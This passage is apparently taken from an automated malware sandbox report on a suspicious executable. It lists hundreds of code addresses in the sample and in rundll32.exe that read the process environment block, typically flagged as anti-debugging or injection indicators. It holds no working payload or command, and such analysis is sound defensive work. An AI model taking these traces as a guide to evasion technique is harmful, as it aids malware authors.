Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A2DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A853CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A853CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A0DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A33B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A33B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A0DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AD8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A0F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A1849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AD8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AD740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AD740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AD740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A86C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A86C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A86C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A86C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A2746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AB8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A8A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A43D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A83540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A27D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A48EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ABFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ABFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A38E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A18794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04688CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04633540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04663D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0463A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04688D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04668DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2581 mov eax, dword ptr fs:[00000030h]
